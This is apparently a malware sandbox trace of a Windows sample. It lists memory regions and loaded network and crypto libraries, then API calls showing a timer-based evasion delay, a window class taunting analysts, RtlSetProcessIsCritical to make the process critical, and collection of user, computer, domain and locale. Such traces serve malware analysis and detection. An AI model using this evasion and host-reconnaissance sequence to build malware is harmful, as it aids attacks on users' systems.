0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5532 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5533 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5534 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5535 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5536 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5537 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5538 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5539 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5540 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5541 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5542 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5543 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5544 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5545 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5546 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5547 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5548 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5549 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5550 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5551 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5552 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5553 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5554 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5555 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5556 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5557 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5558 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5559 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5560 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5561 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 5562 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 5563 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 5564 start_va = 0x74110000 end_va = 0x74251fff entry_point = 0x74110000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 5565 start_va = 0x770d0000 end_va = 0x77161fff entry_point = 0x770d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5566 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 5567 start_va = 0x76fe0000 end_va = 0x77061fff entry_point = 0x76fe0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5568 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 5569 start_va = 0x1e90000 end_va = 0x1e93fff entry_point = 0x1e90000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5570 start_va = 0x2410000 end_va = 0x2452fff entry_point = 0x2410000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000013.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db") Region: id = 5571 start_va = 0x1ea0000 end_va = 0x1ea3fff entry_point = 0x1ea0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5572 start_va = 0x2460000 end_va = 0x24eafff entry_point = 0x2460000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 5573 start_va = 0x24f0000 end_va = 0x2500fff entry_point = 0x24f0000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 5574 start_va = 0x2510000 end_va = 0x2513fff entry_point = 0x2510000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 5575 start_va = 0x2520000 end_va = 0x2532fff entry_point = 0x2520000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 5576 start_va = 0x2540000 end_va = 0x2540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 5577 start_va = 0x2550000 end_va = 0x258ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 5578 start_va = 0x2650000 end_va = 0x274ffff entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5579 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 5580 start_va = 0x2750000 end_va = 0x278ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 5581 start_va = 0x2950000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 5582 start_va = 0x77080000 end_va = 0x770b5fff entry_point = 0x77080000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5583 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 5584 start_va = 0x2790000 end_va = 0x27cffff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 5585 start_va = 0x27d0000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 5586 start_va = 0x2a50000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 5587 start_va = 0x2b50000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 5588 start_va = 0x73fb0000 end_va = 0x7410ffff entry_point = 0x73fb0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 5589 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 5590 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 5591 start_va = 0x2810000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 5592 start_va = 0x2c50000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 5593 start_va = 0x73ce0000 end_va = 0x73fa0fff entry_point = 0x73ce0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 5594 start_va = 0x7fea1000 end_va = 0x7fea3fff entry_point = 0x0 region_type = private name = "private_0x000000007fea1000" filename = "" Region: id = 5595 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002510000" filename = "" Region: id = 5631 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 5632 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 5633 start_va = 0x2d50000 end_va = 0x3d8ffff entry_point = 0x2d50000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 5634 start_va = 0x3d90000 end_va = 0x4281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d90000" filename = "" Region: id = 5635 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 5636 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 5661 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 5662 start_va = 0x4290000 end_va = 0x4782fff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 5737 start_va = 0x4290000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 5738 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 5739 start_va = 0x7fe9e000 end_va = 0x7fea0fff entry_point = 0x0 region_type = private name = "private_0x000000007fe9e000" filename = "" Region: id = 5740 start_va = 0x73bb0000 end_va = 0x73e70fff entry_point = 0x73bb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 5741 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x1e40000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 5742 start_va = 0x74d30000 end_va = 0x74d8bfff entry_point = 0x74d30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5743 start_va = 0x770c0000 end_va = 0x770c6fff entry_point = 0x770c0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5744 start_va = 0x73b90000 end_va = 0x73ba0fff entry_point = 0x73b90000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 5745 start_va = 0x73ae0000 end_va = 0x73b86fff entry_point = 0x73ae0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 5746 start_va = 0x740d0000 end_va = 0x740d7fff entry_point = 0x740d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5747 start_va = 0x740e0000 end_va = 0x7410ffff entry_point = 0x740e0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5748 start_va = 0x73a90000 end_va = 0x73addfff entry_point = 0x73a90000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 5749 start_va = 0x73a00000 end_va = 0x73a83fff entry_point = 0x73a00000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 5750 start_va = 0x738a0000 end_va = 0x739fffff entry_point = 0x738a0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 5752 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 5753 start_va = 0x73890000 end_va = 0x73897fff entry_point = 0x73890000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 5762 start_va = 0x73840000 end_va = 0x73885fff entry_point = 0x73840000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 5763 start_va = 0x2510000 end_va = 0x2511fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002510000" filename = "" Region: id = 5764 start_va = 0x73630000 end_va = 0x73838fff entry_point = 0x73630000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 5782 start_va = 0x2590000 end_va = 0x2592fff entry_point = 0x2590000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 5783 start_va = 0x25a0000 end_va = 0x25a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 5784 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5785 start_va = 0x25d0000 end_va = 0x25d2fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 5786 start_va = 0x2620000 end_va = 0x262ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 5823 start_va = 0x734a0000 end_va = 0x734fffff entry_point = 0x734a0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 5824 start_va = 0x74880000 end_va = 0x749f4fff entry_point = 0x74880000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 5825 start_va = 0x77070000 end_va = 0x7707dfff entry_point = 0x77070000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 6292 start_va = 0x2630000 end_va = 0x2631fff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 6293 start_va = 0x73440000 end_va = 0x73467fff entry_point = 0x73440000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 6294 start_va = 0x73470000 end_va = 0x7348ffff entry_point = 0x73470000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 6295 start_va = 0x73490000 end_va = 0x7349ffff entry_point = 0x73490000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 6297 start_va = 0x73370000 end_va = 0x73377fff entry_point = 0x73370000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 6298 start_va = 0x74ce0000 end_va = 0x74d21fff entry_point = 0x74ce0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 6299 start_va = 0x4290000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 6300 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 6301 start_va = 0x73350000 end_va = 0x7336efff entry_point = 0x73350000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 6302 start_va = 0x7fe9e000 end_va = 0x7fea0fff entry_point = 0x0 region_type = private name = "private_0x000000007fe9e000" filename = "" Region: id = 6303 start_va = 0x2630000 end_va = 0x2639fff entry_point = 0x2630000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 6304 start_va = 0x73330000 end_va = 0x73349fff entry_point = 0x73330000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Thread: id = 1 os_tid = 0xe60 [0032.751] RegisterClassW (lpWndClass=0x19ff10) returned 0xc170 [0032.751] CreateWindowExW (dwExStyle=0x0, lpClassName="AnaLab_sucks", lpWindowName=0x0, dwStyle=0xcf0000, X=0, Y=0, nWidth=300, nHeight=150, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x601e4 [0033.154] SetTimer (hWnd=0x601e4, nIDEvent=0x1, uElapse=0x539, lpTimerFunc=0x0) returned 0x1 [0033.155] ShowWindow (hWnd=0x601e4, nCmdShow=1) returned 0 [0033.159] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0034.483] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0034.483] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0035.827] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0035.827] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0037.162] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0037.162] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0038.506] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0038.506] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0039.855] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0039.855] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0041.199] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0041.199] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0042.543] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0042.543] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0043.886] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0043.886] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0045.235] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0045.235] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0046.699] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0046.700] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0047.912] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0047.912] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0049.286] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0049.286] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0050.626] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0050.626] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0051.969] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0051.969] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0053.451] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0053.451] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0054.833] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0054.833] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0056.159] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0056.159] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0057.508] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0057.509] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0058.852] DispatchMessageW (lpMsg=0x19ff38) returned 0x0 [0058.853] GetMessageW (in: lpMsg=0x19ff38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff38) returned 1 [0060.197] DispatchMessageW (lpMsg=0x19ff38) [0060.197] KillTimer (hWnd=0x601e4, uIDEvent=0x1) returned 1 [0060.198] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x776b0000 [0060.198] RtlAdjustPrivilege (in: Privilege=0x14, NewValue=1, ForThread=0, OldValue=0x19fd60 | out: OldValue=0x19fd60) returned 0x0 [0060.198] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x776b0000 [0060.198] RtlSetProcessIsCritical (in: NewValue=1, OldValue=0x0, IsWinlogon=0 | out: OldValue=0x0) [0060.198] SetErrorMode (uMode=0x1) returned 0x0 [0060.199] OpenProcess (dwDesiredAccess=0xf, bInheritHandle=1, dwProcessId=0x2d) returned 0x0 [0060.199] VirtualAlloc (lpAddress=0x0, dwSize=0x202, flAllocationType=0x3000, flProtect=0x4) returned 0x2e0000 [0060.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.199] GetUserNameW (in: lpBuffer=0x2e0000, pcbBuffer=0x19f9cc | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0x19f9cc) returned 1 [0060.202] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x460000 [0060.202] GetComputerNameW (in: lpBuffer=0x460000, nSize=0x19f9cc | out: lpBuffer="LHNIWSJ", nSize=0x19f9cc) returned 1 [0060.202] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x470000 [0060.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x130) returned 0x0 [0060.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.203] RegQueryValueExW (in: hKey=0x130, lpValueName="Domain", lpReserved=0x0, lpType=0x0, lpData=0x470000, lpcbData=0x19f79c*=0x80 | out: lpType=0x0, lpData=0x470000*=0x0, lpcbData=0x19f79c*=0x2) returned 0x0 [0060.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.203] RegCloseKey (hKey=0x130) returned 0x0 [0060.203] wsprintfW (in: param_1=0x470000, param_2="WORKGROUP" | out: param_1="WORKGROUP") returned 9 [0060.203] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x480000 [0060.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.203] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\International", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x134) returned 0x0 [0060.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.203] RegQueryValueExW (in: hKey=0x134, lpValueName="LocaleName", lpReserved=0x0, lpType=0x0, lpData=0x480000, lpcbData=0x19f79c*=0x40 | out: lpType=0x0, lpData=0x480000*=0x65, lpcbData=0x19f79c*=0xc) returned 0x0 [0060.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.204] RegCloseKey (hKey=0x134) returned 0x0 [0060.204] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x490000 [0060.204] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x4a0000 